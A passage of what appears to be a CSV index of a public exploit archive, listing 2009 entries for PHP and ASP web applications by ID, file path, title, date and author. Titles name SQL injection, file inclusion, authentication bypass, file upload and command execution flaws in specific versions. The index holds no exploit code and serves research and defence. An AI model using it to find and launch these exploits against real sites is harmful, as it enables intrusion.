Injection",2009-03-30,SirGod,webapps,php, +8315,exploits/php/webapps/8315.txt,"gravy media CMS 1.07 - Multiple Vulnerabilities",2009-03-30,x0r,webapps,php, +8317,exploits/php/webapps/8317.pl,"X-Forum 0.6.2 - Remote Command Execution",2009-03-30,Osirys,webapps,php, +8318,exploits/php/webapps/8318.txt,"JobHut 1.2 - 'pk' SQL Injection",2009-03-30,K-159,webapps,php, +8319,exploits/php/webapps/8319.txt,"family connection 1.8.1 - Multiple Vulnerabilities",2009-03-30,"Salvatore Fresta",webapps,php, +8323,exploits/php/webapps/8323.txt,"Community CMS 0.5 - Multiple SQL Injections",2009-03-31,"Salvatore Fresta",webapps,php, +8324,exploits/php/webapps/8324.php,"Podcast Generator 1.1 - Remote Code Execution",2009-03-31,BlackHawk,webapps,php, +8326,exploits/php/webapps/8326.rb,"VirtueMart 1.1.2 - SQL Injection (Metasploit)",2009-03-31,waraxe,webapps,php, +8327,exploits/php/webapps/8327.txt,"virtuemart 1.1.2 - Multiple Vulnerabilities",2009-03-31,waraxe,webapps,php, +8328,exploits/php/webapps/8328.txt,"webEdition 6.0.0.4 - 'WE_LANGUAGE' Local File Inclusion",2009-03-31,"Salvatore Fresta",webapps,php, +8329,exploits/php/webapps/8329.txt,"JobHut 1.2 - Remote Password Change/Delete/Activate User",2009-03-31,"ThE g0bL!N",webapps,php, +8330,exploits/php/webapps/8330.txt,"PHPRecipeBook 2.39 - 'course_id' SQL Injection",2009-03-31,DarKdewiL,webapps,php, +8331,exploits/php/webapps/8331.txt,"vsp stats processor 0.45 - 'gamestat.php?gameID' SQL Injection",2009-03-31,Dimi4,webapps,php, +8334,exploits/php/webapps/8334.txt,"Koschtit Image Gallery 1.82 - Multiple Local File Inclusions",2009-04-01,ahmadbady,webapps,php, +8341,exploits/php/webapps/8341.txt,"MyioSoft Ajax Portal 3.0 - 'page' SQL Injection",2009-04-01,cOndemned,webapps,php, +8342,exploits/php/webapps/8342.txt,"TinyPHPForum 3.61 - File Disclosure / Code Execution",2009-04-01,brain[pillow],webapps,php, +8346,exploits/php/webapps/8346.txt,"ActiveKB KnowledgeBase - 'Panel' Local File Inclusion",2009-04-03,"Angela Chang",webapps,php, +8347,exploits/php/webapps/8347.php,"glFusion 1.1.2 - 'COM_applyFilter()/cookies' Blind SQL Injection",2009-04-03,Nine:Situations:Group,webapps,php, +8348,exploits/php/webapps/8348.txt,"form2list - 'page.php?id' SQL Injection",2009-04-03,Cyber-Zone,webapps,php, +8349,exploits/php/webapps/8349.c,"Family Connections 1.8.2 - Arbitrary File Upload",2009-04-03,"Salvatore Fresta",webapps,php, +8350,exploits/php/webapps/8350.txt,"Gravity Board X 2.0 Beta - SQL Injection / Authenticated Code Execution",2009-04-03,brain[pillow],webapps,php, +8351,exploits/php/webapps/8351.pl,"AdaptBB 1.0 - 'topic_id' SQL Injection / Credentials Disclosure",2009-04-03,StAkeR,webapps,php, +8353,exploits/php/webapps/8353.txt,"Joomla! Component com_bookJoomlas 0.1 - SQL Injection",2009-04-06,"Salvatore Fresta",webapps,php, +8355,exploits/php/webapps/8355.txt,"FlexCMS Calendar - 'itemID' Blind SQL Injection",2009-04-06,Lanti-Net,webapps,php, +8357,exploits/php/webapps/8357.py,"iDB 0.2.5pa SVN 243 - 'skin' Local File Inclusion",2009-04-06,LOTFREE,webapps,php, +8361,exploits/php/webapps/8361.txt,"Family Connections CMS 1.8.2 - Blind SQL Injection",2009-04-07,"Salvatore Fresta",webapps,php, +8362,exploits/php/webapps/8362.php,"Lanius CMS 0.5.2 - Arbitrary File Upload",2009-04-07,EgiX,webapps,php, +8364,exploits/php/webapps/8364.txt,"saspcms 0.9 - Multiple Vulnerabilities",2009-04-08,BugReport.IR,webapps,php, +8365,exploits/php/webapps/8365.txt,"Joomla! Component Maian Music 1.2.1 - 'category' SQL Injection",2009-04-08,H!tm@N,webapps,php, +8366,exploits/php/webapps/8366.txt,"Joomla! Component MailTo - 'article' SQL Injection",2009-04-08,H!tm@N,webapps,php, +8367,exploits/php/webapps/8367.txt,"Joomla! Component Cmimarketplace - 'viewit' Directory Traversal",2009-04-08,H!tm@N,webapps,php, +8372,exploits/php/webapps/8372.txt,"photo graffix 3.4 - Multiple Vulnerabilities",2009-04-08,ahmadbady,webapps,php, +8373,exploits/php/webapps/8373.txt,"Xplode CMS - 'wrap_script' SQL Injection",2009-04-08,PLATEN,webapps,php, +8374,exploits/php/webapps/8374.txt,"WebFileExplorer 3.1 - 'db.mdb' Database Disclosure",2009-04-08,ByALBAYX,webapps,php, +8376,exploits/php/webapps/8376.php,"Geeklog 1.5.2 - 'SEC_authenticate()' SQL Injection",2009-04-09,Nine:Situations:Group,webapps,php, +8377,exploits/asp/webapps/8377.pl,"Exjune Guestbook 2.0 - Remote Database Disclosure",2009-04-09,AlpHaNiX,webapps,asp, +8379,exploits/asp/webapps/8379.txt,"Back-End CMS 5.0 - 'main.asp?id' SQL Injection",2009-04-09,AnGeL25dZ,webapps,asp, +8380,exploits/php/webapps/8380.txt,"Simbas CMS 2.0 - Authentication Bypass",2009-04-09,"ThE g0bL!N",webapps,php, +8382,exploits/php/webapps/8382.txt,"WebFileExplorer 3.1 - Authentication Bypass",2009-04-09,Osirys,webapps,php, +8383,exploits/php/webapps/8383.txt,"adaptbb 1.0b - Multiple Vulnerabilities",2009-04-09,"Salvatore Fresta",webapps,php, +8385,exploits/php/webapps/8385.txt,"My Dealer CMS 2.0 - Authentication Bypass",2009-04-09,"ThE g0bL!N",webapps,php, +8386,exploits/php/webapps/8386.txt,"Absolute Form Processor XE-V 1.5 - Authentication Bypass",2009-04-09,"ThE g0bL!N",webapps,php, +8387,exploits/php/webapps/8387.txt,"dynamic flash forum 1.0 Beta - Multiple Vulnerabilities",2009-04-09,"Salvatore Fresta",webapps,php, +8388,exploits/php/webapps/8388.txt,"PHP-Agenda 2.2.5 - Remote File Overwriting",2009-04-10,"Salvatore Fresta",webapps,php, +8389,exploits/php/webapps/8389.txt,"Loggix Project 9.4.5 - 'refer_id' Blind SQL Injection",2009-04-10,"Salvatore Fresta",webapps,php, +8394,exploits/php/webapps/8394.txt,"moziloCMS 1.11 - Local File Inclusion / Full Path Disclosure / Cross-Site Scripting",2009-04-10,SirGod,webapps,php, +8395,exploits/php/webapps/8395.txt,"RedaxScript 0.2.0 - 'Language' Local File Inclusion",2009-04-10,SirGod,webapps,php, +8396,exploits/php/webapps/8396.pl,"w3bcms Gaestebuch 3.0.0 - Blind SQL Injection",2009-04-10,DNX,webapps,php, +8397,exploits/asp/webapps/8397.txt,"FunkyASP AD System 1.1 - Arbitrary File Upload",2009-04-10,ZoRLu,webapps,asp, +8399,exploits/php/webapps/8399.pl,"Flatnuke 2.7.1 - 'level' Privilege Escalation",2009-04-13,StAkeR,webapps,php, +8408,exploits/php/webapps/8408.txt,"X10media Mp3 Search Engine < 1.6.2 - Admin Access",2009-04-13,THUNDER,webapps,php, +8409,exploits/php/webapps/8409.txt,"Yellow Duck Weblog 2.1.0 - 'lang' Local File Inclusion",2009-04-13,ahmadbady,webapps,php, +8414,exploits/php/webapps/8414.txt,"XEngineSoft PMS/MGS/NM/Ams 1.0 - Authentication Bypass",2009-04-13,Dr-HTmL,webapps,php, +8415,exploits/php/webapps/8415.txt,"FreznoShop 1.3.0 - 'id' SQL Injection",2009-04-13,NoGe,webapps,php, +8417,exploits/php/webapps/8417.txt,"e107 Plugin userjournals_menu - 'blog.id' SQL Injection",2009-04-13,boom3rang,webapps,php, +8418,exploits/php/webapps/8418.pl,"ASP Product Catalog 1.0 - Cross-Site Scripting / File Disclosure",2009-04-13,AlpHaNiX,webapps,php, +8423,exploits/php/webapps/8423.txt,"Jamroom 4.0.2 - 't' Local File Inclusion",2009-04-14,zxvf,webapps,php, +8424,exploits/php/webapps/8424.txt,"ablespace 1.0 - Cross-Site Scripting / Blind SQL Injection",2009-04-14,DSecRG,webapps,php, +8425,exploits/php/webapps/8425.txt,"PHP-revista 1.1.2 - Remote File Inclusion / SQL Injection / Authentication Bypass / Cross-Site Scripting",2009-04-14,SirDarckCat,webapps,php, +8431,exploits/php/webapps/8431.txt,"GuestCal 2.1 - 'index.php?lang' Local File Inclusion",2009-04-14,SirGod,webapps,php, +8432,exploits/php/webapps/8432.txt,"Aqua CMS - 'Username' SQL Injection",2009-04-14,halkfild,webapps,php, +8433,exploits/php/webapps/8433.txt,"RQms (Rash) 1.2.2 - Multiple SQL Injections",2009-04-14,Dimi4,webapps,php, +8435,exploits/php/webapps/8435.txt,"phpEmployment - 'conf.inc' File Disclosure",2009-04-14,InjEctOr5,webapps,php, +8436,exploits/php/webapps/8436.txt,"Job2C 4.2 - 'profile' Arbitrary File Upload",2009-04-15,InjEctOr5,webapps,php, +8437,exploits/php/webapps/8437.txt,"phpAdBoard - 'conf.inc' Remote Configuration File Disclosure",2009-04-15,InjEctOr5,webapps,php, +8438,exploits/php/webapps/8438.txt,"phpGreetCards - Config File Disclosure",2009-04-15,InjEctOr5,webapps,php, +8439,exploits/php/webapps/8439.txt,"W2B Restaurant 1.2 - 'conf.inc' Configuration File Disclosure",2009-04-15,InjEctOr5,webapps,php, +8440,exploits/php/webapps/8440.txt,"phpAdBoardPro - 'config.inc' Configuration File Disclosure",2009-04-15,InjEctOr5,webapps,php, +8441,exploits/php/webapps/8441.txt,"phpDatingClub - 'conf.inc' File Disclosure",2009-04-15,InjEctOr5,webapps,php, +8442,exploits/php/webapps/8442.txt,"Job2C - 'conf.inc' Configuration File Disclosure",2009-04-15,InjEctOr5,webapps,php, +8443,exploits/php/webapps/8443.txt,"Job2C 4.2 - 'adtype' Local File Inclusion",2009-04-15,ZoRLu,webapps,php, +8446,exploits/php/webapps/8446.txt,"FreeWebShop.org 2.2.9 RC2 - 'lang_file' Local File Inclusion",2009-04-15,ahmadbady,webapps,php, +8448,exploits/php/webapps/8448.php,"Geeklog 1.5.2 - 'savepreferences()/*blocks[]' SQL Injection",2009-04-16,Nine:Situations:Group,webapps,php, +8449,exploits/php/webapps/8449.txt,"NetHoteles 2.0/3.0 - Authentication Bypass",2009-04-16,Dns-Team,webapps,php, +8450,exploits/php/webapps/8450.txt,"Online Password Manager 4.1 - Insecure Cookie Handling",2009-04-16,ZoRLu,webapps,php, +8453,exploits/php/webapps/8453.txt,"webSPELL 4.2.0c - Bypass BBCode Cross-Site Scripting Cookie Stealing",2009-04-16,YEnH4ckEr,webapps,php, +8454,exploits/php/webapps/8454.txt,"DNS Tools (PHP Digger) - Remote Command Execution",2009-04-16,SirGod,webapps,php, +8455,exploits/php/webapps/8455.txt,"CPCommerce 1.2.8 - 'id_document' Blind SQL Injection",2009-04-16,NoGe,webapps,php, +8457,exploits/php/webapps/8457.txt,"NetHoteles 3.0 - 'ficha.php' SQL Injection",2009-04-16,snakespc,webapps,php, +8459,exploits/php/webapps/8459.html,"eLitius 1.0 - '/manage-admin.php' Arbitrary Add Admin/Change Password",2009-04-16,"ThE g0bL!N",webapps,php, +8460,exploits/php/webapps/8460.txt,"SMA-DB 0.3.13 - Multiple Remote File Inclusions",2009-04-16,JosS,webapps,php, +8461,exploits/php/webapps/8461.txt,"chCounter 3.1.3 - Authentication Bypass",2009-04-16,tmh,webapps,php, +8464,exploits/php/webapps/8464.txt,"Tiny Blogr 1.0.0 rc4 - Authentication Bypass",2009-04-17,"Salvatore Fresta",webapps,php, +8468,exploits/php/webapps/8468.txt,"Limbo CMS 1.0.4.2 - Cross-Site Request Forgery / Privilege Escalation (PoC)",2009-04-17,"Alfons Luja",webapps,php, +8471,exploits/php/webapps/8471.txt,"ClanTiger < 1.1.1 - Multiple Insecure Cookie Handling Vulnerabilities",2009-04-17,YEnH4ckEr,webapps,php, +8472,exploits/php/webapps/8472.txt,"ClanTiger 1.1.1 - Authentication Bypass",2009-04-17,YEnH4ckEr,webapps,php, +8473,exploits/php/webapps/8473.pl,"ClanTiger 1.1.1 - 'slug' Blind SQL Injection",2009-04-17,YEnH4ckEr,webapps,php, +8474,exploits/php/webapps/8474.txt,"e-cart.biz Shopping Cart - Arbitrary File Upload",2009-04-17,ahmadbady,webapps,php, +8475,exploits/php/webapps/8475.txt,"Esoftpro Online Guestbook Pro - 'display' Blind SQL Injection",2009-04-17,"Hussin X",webapps,php, +8476,exploits/php/webapps/8476.txt,"Online Email Manager - Insecure Cookie Handling",2009-04-17,"Hussin X",webapps,php, +8477,exploits/php/webapps/8477.txt,"Hot Project 7.0 - Authentication Bypass",2009-04-17,HCOCA_MAN,webapps,php, +8480,exploits/php/webapps/8480.txt,"multi-lingual E-Commerce system 0.2 - Multiple Vulnerabilities",2009-04-20,"Salvatore Fresta",webapps,php, +8481,exploits/php/webapps/8481.txt,"Studio Lounge Address Book 2.5 - 'profile' Arbitrary File Upload",2009-04-20,JosS,webapps,php, +8482,exploits/php/webapps/8482.txt,"Seditio CMS Events Plugin - 'c' SQL Injection",2009-04-20,OoN_Boy,webapps,php, +8483,exploits/php/webapps/8483.txt,"Flatnux 2009-03-27 - Arbitrary File Upload / Information Disclosure",2009-04-20,girex,webapps,php, +8486,exploits/php/webapps/8486.txt,"webClassifieds 2005 - (Authentication Bypass) Insecure Cookie Handling",2009-04-20,"ThE g0bL!N",webapps,php, +8487,exploits/php/webapps/8487.txt,"EZ Webitor - Authentication Bypass",2009-04-20,snakespc,webapps,php, +8488,exploits/php/webapps/8488.pl,"Pligg CMS 9.9.0 - 'editlink.php' Blind SQL Injection",2009-04-20,"Rohit Bansal",webapps,php, +8491,exploits/php/webapps/8491.pl,"WysGui CMS 1.2b - Insecure Cookie Handling Blind SQL Injection",2009-04-20,YEnH4ckEr,webapps,php, +8492,exploits/php/webapps/8492.txt,"WB News 2.1.2 - Insecure Cookie Handling",2009-04-20,"ThE g0bL!N",webapps,php, +8493,exploits/php/webapps/8493.txt,"fungamez rc1 - Authentication Bypass / Local File Inclusion",2009-04-20,YEnH4ckEr,webapps,php, +8494,exploits/php/webapps/8494.txt,"TotalCalendar 2.4 - 'inc_dir' Remote File Inclusion",2009-04-20,DarKdewiL,webapps,php, +8495,exploits/php/webapps/8495.pl,"e107 < 0.7.15 - 'extended_user_fields' Blind SQL Injection",2009-04-20,StAkeR,webapps,php, +8496,exploits/php/webapps/8496.html,"TotalCalendar 2.4 - Remote Password Change",2009-04-20,"ThE g0bL!N",webapps,php, +8497,exploits/php/webapps/8497.txt,"Creasito E-Commerce 1.3.16 - Authentication Bypass",2009-04-20,"Salvatore Fresta",webapps,php, +8498,exploits/php/webapps/8498.txt,"eLitius 1.0 - Arbitrary Database Backup",2009-04-20,"ThE g0bL!N",webapps,php, +8499,exploits/php/webapps/8499.php,"Dokeos Lms 1.8.5 - 'whoisonline.php' PHP Code Injection",2009-04-21,EgiX,webapps,php, +8501,exploits/php/webapps/8501.txt,"CRE Loaded 6.2 - 'products_id' SQL Injection",2009-04-21,Player,webapps,php, +8502,exploits/php/webapps/8502.txt,"pastelcms 0.8.0 - Local File Inclusion / SQL Injection",2009-04-21,SirGod,webapps,php, +8503,exploits/php/webapps/8503.txt,"TotalCalendar 2.4 - 'Include' Local File Inclusion",2009-04-21,SirGod,webapps,php, +8504,exploits/php/webapps/8504.txt,"NotFTP 1.3.1 - 'newlang' Local File Inclusion",2009-04-21,Kacper,webapps,php, +8505,exploits/php/webapps/8505.txt,"Quick.CMS.Lite 0.5 - 'id' SQL Injection",2009-04-21,Player,webapps,php, +8506,exploits/php/webapps/8506.txt,"VS PANEL 7.3.6 - 'Cat_ID' SQL Injection",2009-04-21,Player,webapps,php, +8508,exploits/php/webapps/8508.txt,"I-Rater Pro/Plantinum 4.0 - Authentication Bypass",2009-04-21,Hakxer,webapps,php, +8509,exploits/php/webapps/8509.txt,"Studio Lounge Address Book 2.5 - Authentication Bypass",2009-04-21,"ThE g0bL!N",webapps,php, +8510,exploits/php/webapps/8510.txt,"mixedcms 1.0b - Local File Inclusion / Arbitrary File Upload / Authentication Bypass / File Disclosure",2009-04-21,YEnH4ckEr,webapps,php, +8513,exploits/php/webapps/8513.pl,"Dokeos Lms 1.8.5 - 'Include' Remote Code Execution",2009-04-22,StAkeR,webapps,php, +8514,exploits/php/webapps/8514.txt,"Elkagroup Image Gallery 1.0 - Arbitrary File Upload",2009-04-22,Securitylab.ir,webapps,php, +8515,exploits/php/webapps/8515.txt,"5 star Rating 1.2 - Authentication Bypass",2009-04-22,zer0day,webapps,php, +8516,exploits/php/webapps/8516.txt,"WebPortal CMS 0.8b - Multiple Local/Remote File Inclusions",2009-04-22,ahmadbady,webapps,php, +8517,exploits/php/webapps/8517.txt,"Joomla! Component rsmonials - Cross-Site Scripting",2009-04-22,jdc,webapps,php, +8521,exploits/php/webapps/8521.txt,"fowlcms 1.1 - Authentication Bypass / Local File Inclusion / Arbitrary File Upload",2009-04-23,YEnH4ckEr,webapps,php, +8529,exploits/asp/webapps/8529.txt,"Absolute Form Processor XE-V 1.5 - Insecure Cookie Handling",2009-04-24,ZoRLu,webapps,asp, +8530,exploits/asp/webapps/8530.html,"Absolute Form Processor XE-V 1.5 - Remote Change Password",2009-04-24,"ThE g0bL!N",webapps,asp, +8532,exploits/php/webapps/8532.txt,"photo-rigma.biz 30 - SQL Injection / Cross-Site Scripting",2009-04-24,YEnH4ckEr,webapps,php, +8533,exploits/php/webapps/8533.txt,"Pragyan CMS 2.6.4 - Multiple SQL Injections",2009-04-24,"Salvatore Fresta",webapps,php, +8538,exploits/php/webapps/8538.txt,"Invision Power Board 3.0.0b5 - Active Cross-Site Scripting / Full Path Disclosure",2009-04-27,brain[pillow],webapps,php, +8539,exploits/php/webapps/8539.txt,"Opencart 1.1.8 - 'route' Local File Inclusion",2009-04-27,OoN_Boy,webapps,php, +8543,exploits/php/webapps/8543.php,"LightBlog 9.9.2 - 'register.php' Remote Code Execution",2009-04-27,EgiX,webapps,php, +8545,exploits/php/webapps/8545.txt,"Dew-NewPHPLinks 2.0 - Local File Inclusion / Cross-Site Scripting",2009-04-27,d3v1l,webapps,php, +8546,exploits/php/webapps/8546.txt,"Thickbox Gallery 2 - 'index.php' Local File Inclusion",2009-04-27,SirGod,webapps,php, +8547,exploits/php/webapps/8547.txt,"EZ-Blog Beta2 - 'category' SQL Injection",2009-04-27,YEnH4ckEr,webapps,php, +8548,exploits/php/webapps/8548.txt,"ECShop 2.5.0 - 'order_sn' SQL Injection",2009-04-27,Securitylab.ir,webapps,php, +8549,exploits/php/webapps/8549.txt,"Flatchat 3.0 - 'pmscript.php' Local File Inclusion",2009-04-27,SirGod,webapps,php, +8550,exploits/php/webapps/8550.txt,"Teraway LinkTracker 1.0 - Insecure Cookie Handling",2009-04-27,"ThE g0bL!N",webapps,php, +8551,exploits/php/webapps/8551.txt,"Teraway FileStream 1.0 - Insecure Cookie Handling",2009-04-27,"ThE g0bL!N",webapps,php, +8552,exploits/php/webapps/8552.txt,"Teraway LiveHelp 2.0 - Insecure Cookie Handling",2009-04-27,"ThE g0bL!N",webapps,php, +8553,exploits/php/webapps/8553.html,"Teraway LinkTracker 1.0 - Remote Password Change",2009-04-27,"ThE g0bL!N",webapps,php, +8555,exploits/php/webapps/8555.txt,"ABC Advertise 1.0 - Admin Password Disclosure",2009-04-27,SirGod,webapps,php, +8557,exploits/php/webapps/8557.html,"VisionLms 1.0 - 'changePW.php' Remote Password Change",2009-04-28,Mr.tro0oqy,webapps,php, +8558,exploits/php/webapps/8558.txt,"MIM: InfiniX 1.2.003 - Multiple SQL Injections",2009-04-28,YEnH4ckEr,webapps,php, +8559,exploits/php/webapps/8559.c,"webSPELL 4.2.0d (Linux) - Local File Disclosure (C)",2009-04-28,StAkeR,webapps,php, +8563,exploits/php/webapps/8563.txt,"eLitius 1.0 - 'banner-details.php?id' SQL Injection",2009-04-29,snakespc,webapps,php, +8565,exploits/php/webapps/8565.txt,"ProjectCMS 1.0b - 'index.php?sn' SQL Injection",2009-04-29,YEnH4ckEr,webapps,php, +8566,exploits/php/webapps/8566.txt,"S-CMS 1.1 Stable - 'page' Local File Inclusion",2009-04-29,ZoRLu,webapps,php, +8567,exploits/php/webapps/8567.txt,"Zubrag Smart File Download 1.3 - Arbitrary File Download",2009-04-29,Aodrulez,webapps,php, +8571,exploits/php/webapps/8571.txt,"Tiger Dms - Authentication Bypass",2009-04-29,"ThE g0bL!N",webapps,php, +8576,exploits/php/webapps/8576.pl,"Leap CMS 0.1.4 - 'searchterm' Blind SQL Injection",2009-04-30,YEnH4ckEr,webapps,php, +8577,exploits/php/webapps/8577.txt,"Leap CMS 0.1.4 - SQL Injection / Cross-Site Scripting / Arbitrary File Upload",2009-04-30,YEnH4ckEr,webapps,php, +8585,exploits/php/webapps/8585.txt,"Golabi CMS 1.0.1 - Session Poisoning",2009-05-01,CrazyAngel,webapps,php, +8586,exploits/php/webapps/8586.txt,"MiniTwitter 0.2b - Multiple SQL Injections",2009-05-01,YEnH4ckEr,webapps,php, +8587,exploits/php/webapps/8587.html,"MiniTwitter 0.2b - Remote User Options Changer",2009-05-01,YEnH4ckEr,webapps,php, +8593,exploits/php/webapps/8593.txt,"pecio CMS 1.1.5 - 'index.php?language' Local File Inclusion",2009-05-01,SirGod,webapps,php, +8596,exploits/asp/webapps/8596.pl,"Winn ASP Guestbook 1.01b - Remote Database Disclosure",2009-05-04,ZoRLu,webapps,asp, +8599,exploits/php/webapps/8599.txt,"AGTC MyShop 3.2 - Insecure Cookie Handling",2009-05-04,Mr.tro0oqy,webapps,php, +8600,exploits/php/webapps/8600.txt,"BluSky CMS - 'news_id' SQL Injection",2009-05-04,snakespc,webapps,php, +8602,exploits/php/webapps/8602.txt,"Qt QuickTeam - Multiple Remote File Inclusions",2009-05-04,ahmadbady,webapps,php, +8603,exploits/php/webapps/8603.php,"eLitius 1.0 - Remote Command Execution",2009-05-04,G4N0K,webapps,php, +8604,exploits/php/webapps/8604.txt,"PHP Site Lock 2.0 - Insecure Cookie Handling",2009-05-04,"ThE g0bL!N",webapps,php, +8605,exploits/php/webapps/8605.txt,"Million Dollar Text Links 1.0 - Arbitrary Authentication Bypass",2009-05-04,"ThE g0bL!N",webapps,php, +8608,exploits/php/webapps/8608.txt,"projectCMS 1.1b - Multiple Vulnerabilities",2009-05-04,YEnH4ckEr,webapps,php, +8609,exploits/php/webapps/8609.pl,"Uguestbook 1.0b - 'Guestbook.mdb' Arbitrary Database Disclosure",2009-05-04,Cyber-Zone,webapps,php, +8610,exploits/asp/webapps/8610.pl,"Ublog access version - Arbitrary Database Disclosure",2009-05-04,Cyber-Zone,webapps,asp, +8615,exploits/php/webapps/8615.txt,"TemaTres 1.0.3 - Authentication Bypass / SQL Injection / Cross-Site Scripting",2009-05-05,YEnH4ckEr,webapps,php, +8616,exploits/php/webapps/8616.pl,"TemaTres 1.0.3 - Blind SQL Injection",2009-05-05,YEnH4ckEr,webapps,php, +8618,exploits/php/webapps/8618.txt,"LinkBase 2.0 - Remote Cookie Grabber",2009-05-05,SirGod,webapps,php, +8619,exploits/php/webapps/8619.txt,"Joomla! Component Almond Classifieds 5.6.2 - Blind SQL Injection",2009-05-05,InjEctOr5,webapps,php, +8622,exploits/php/webapps/8622.pl,"webSPELL 4.2.0e - 'page' Blind SQL Injection",2009-05-07,DNX,webapps,php, +8626,exploits/php/webapps/8626.txt,"TCPDB 3.8 - Arbitrary Add Admin Account",2009-05-07,Mr.tro0oqy,webapps,php, +8627,exploits/asp/webapps/8627.txt,"T-Dreams Job Career Package 3.0 - Insecure Cookie Handling",2009-05-07,TiGeR-Dz,webapps,asp, +8635,exploits/php/webapps/8635.txt,"VIDEOSCRIPT.us - Authentication Bypass",2009-05-07,snakespc,webapps,php, +8636,exploits/php/webapps/8636.txt,"ST-Gallery 0.1a - Multiple SQL Injections",2009-05-07,YEnH4ckEr,webapps,php, +8638,exploits/php/webapps/8638.html,"Simple Customer 1.3 - Arbitrary Change Admin Password",2009-05-07,ahmadbady,webapps,php, +8639,exploits/php/webapps/8639.html,"Job Script 2.0 - Arbitrary Change Admin Password",2009-05-07,TiGeR-Dz,webapps,php, +8642,exploits/php/webapps/8642.txt,"The Recipe Script 5 - Authentication Bypass / Database Backup",2009-05-08,TiGeR-Dz,webapps,php, +8643,exploits/php/webapps/8643.txt,"Realty Web-Base 1.0 - Authentication Bypass",2009-05-08,"ThE g0bL!N",webapps,php, +8645,exploits/php/webapps/8645.txt,"Luxbum 0.5.5/stable - Authentication Bypass",2009-05-08,knxone,webapps,php, +8647,exploits/php/webapps/8647.txt,"Battle Blog 1.25 - 'uploadform.asp' Arbitrary File Upload",2009-05-08,Cyber-Zone,webapps,php, +8648,exploits/php/webapps/8648.pl,"RTWebalbum 1.0.462 - 'albumID' Blind SQL Injection",2009-05-08,YEnH4ckEr,webapps,php, +8649,exploits/php/webapps/8649.php,"TinyWebGallery 1.7.6 - Local File Inclusion / Remote Code Execution",2009-05-08,EgiX,webapps,php, +8652,exploits/php/webapps/8652.pl,"EggBlog 4.1.1 - Local Directory Traversal",2009-05-11,StAkeR,webapps,php, +8653,exploits/php/webapps/8653.txt,"Dacio's Image Gallery 1.6 - Directory Traversal / Authentication Bypass / Arbitrary File Upload",2009-05-11,ahmadbady,webapps,php, +8654,exploits/php/webapps/8654.txt,"openWYSIWYG 1.4.7 - Local Directory Traversal",2009-05-11,StAkeR,webapps,php, +8655,exploits/php/webapps/8655.pl,"microTopic 1 - 'Rating' Blind SQL Injection",2009-05-11,YEnH4ckEr,webapps,php, +8658,exploits/php/webapps/8658.txt,"PHP recommend 1.3 - Authentication Bypass / Remote File Inclusion / Code Injection",2009-05-11,scriptjunkie,webapps,php, +8659,exploits/php/webapps/8659.php,"Bitweaver 2.6 - 'saveFeed()' Remote Code Execution",2009-05-12,Nine:Situations:Group,webapps,php, +8664,exploits/php/webapps/8664.pl,"BigACE 2.5 - SQL Injection",2009-05-12,YEnH4ckEr,webapps,php, +8667,exploits/php/webapps/8667.txt,"TinyButStrong 3.4.0 - 'script' Local File Disclosure",2009-05-13,ahmadbady,webapps,php, +8668,exploits/php/webapps/8668.txt,"Password Protector SD 1.3.1 - Insecure Cookie Handling",2009-05-13,Mr.tro0oqy,webapps,php, +8671,exploits/php/webapps/8671.pl,"Family Connections CMS 1.9 - SQL Injection",2009-05-13,YEnH4ckEr,webapps,php, +8672,exploits/php/webapps/8672.php,"MaxCMS 2.0 - 'm_username' Arbitrary Create Admin",2009-05-13,Securitylab.ir,webapps,php, +8674,exploits/php/webapps/8674.txt,"Mlffat 2.1 - Cookie Authentication Bypass",2009-05-13,Qabandi,webapps,php, +8675,exploits/php/webapps/8675.txt,"Ascad Networks 5 - Products Insecure Cookie Handling",2009-05-14,G4N0K,webapps,php, +8676,exploits/php/webapps/8676.txt,"My Game Script 2.0 - Authentication Bypass",2009-05-14,"ThE g0bL!N",webapps,php, +8679,exploits/php/webapps/8679.txt,"Shutter 0.1.1 - Multiple SQL Injections",2009-05-14,YEnH4ckEr,webapps,php, +8680,exploits/php/webapps/8680.txt,"beLive 0.2.3 - 'arch.php?arch' Local File Inclusion",2009-05-14,Kacper,webapps,php, +8681,exploits/php/webapps/8681.php,"StrawBerry 1.1.1 - Local File Inclusion / Remote Command Execution",2009-05-14,[AVT],webapps,php, +8682,exploits/php/webapps/8682.txt,"MRCGIGUY ClickBank Directory 1.0.1 - Insecure Cookie Handling",2009-05-14,TiGeR-Dz,webapps,php, +8683,exploits/php/webapps/8683.txt,"Submitter Script - Authentication Bypass",2009-05-14,"ThE g0bL!N",webapps,php, +8684,exploits/php/webapps/8684.txt,"MRCGIGUY Hot Links SQL 3.2.0 - Insecure Cookie Handling",2009-05-14,TiGeR-Dz,webapps,php, +8685,exploits/php/webapps/8685.txt,"MRCGIGUY Amazon Directory 1.0/2.0 - Insecure Cookie Handling",2009-05-14,TiGeR-Dz,webapps,php, +8686,exploits/php/webapps/8686.txt,"MRCGIGUY Message Box 1.0 - Insecure Cookie Handling",2009-05-14,TiGeR-Dz,webapps,php, +8687,exploits/php/webapps/8687.txt,"MRCGIGUY The Ticket System 2.0 - Insecure Cookie Handling",2009-05-14,TiGeR-Dz,webapps,php, +8688,exploits/php/webapps/8688.txt,"MRCGIGUY Ultimate Profit Portal 1.0.1 - Insecure Cookie Handling",2009-05-14,TiGeR-Dz,webapps,php, +8689,exploits/php/webapps/8689.txt,"2DayBiz Business Community Script - Multiple Vulnerabilities",2009-05-14,TiGeR-Dz,webapps,php, +8690,exploits/php/webapps/8690.txt,"Easy Scripts Answer and Question Script - Multiple Vulnerabilities",2009-05-14,InjEctOr5,webapps,php, +8691,exploits/php/webapps/8691.txt,"2DayBiz Template Monster Clone - 'edituser.php' Change Pass",2009-05-14,TiGeR-Dz,webapps,php, +8692,exploits/php/webapps/8692.txt,"MRCGIGUY SimpLISTic SQL 2.0.0 - Insecure Cookie Handling",2009-05-14,"ThE g0bL!N",webapps,php, +8694,exploits/php/webapps/8694.txt,"MRCGIGUY Top Sites 1.0.0 - Insecure Cookie Handling",2009-05-14,"ThE g0bL!N",webapps,php, +8697,exploits/php/webapps/8697.txt,"Joomla! Component ArtForms 2.1 b7 - Remote File Inclusion",2009-05-15,iskorpitx,webapps,php, +8699,exploits/php/webapps/8699.php,"Harland Scripts 11 - Products Remote Command Execution",2009-05-15,G4N0K,webapps,php, +8700,exploits/php/webapps/8700.txt,"Rama CMS 0.9.8 - 'download.php' File Disclosure",2009-05-15,Br0ly,webapps,php, +8702,exploits/php/webapps/8702.txt,"2DayBiz Custom T-shirt Design - SQL Injection / Cross-Site Scripting",2009-05-15,snakespc,webapps,php, +8705,exploits/asp/webapps/8705.txt,"DMXReady Registration Manager 1.1 - Database Disclosure",2009-05-15,S4S-T3rr0r!sT,webapps,asp, 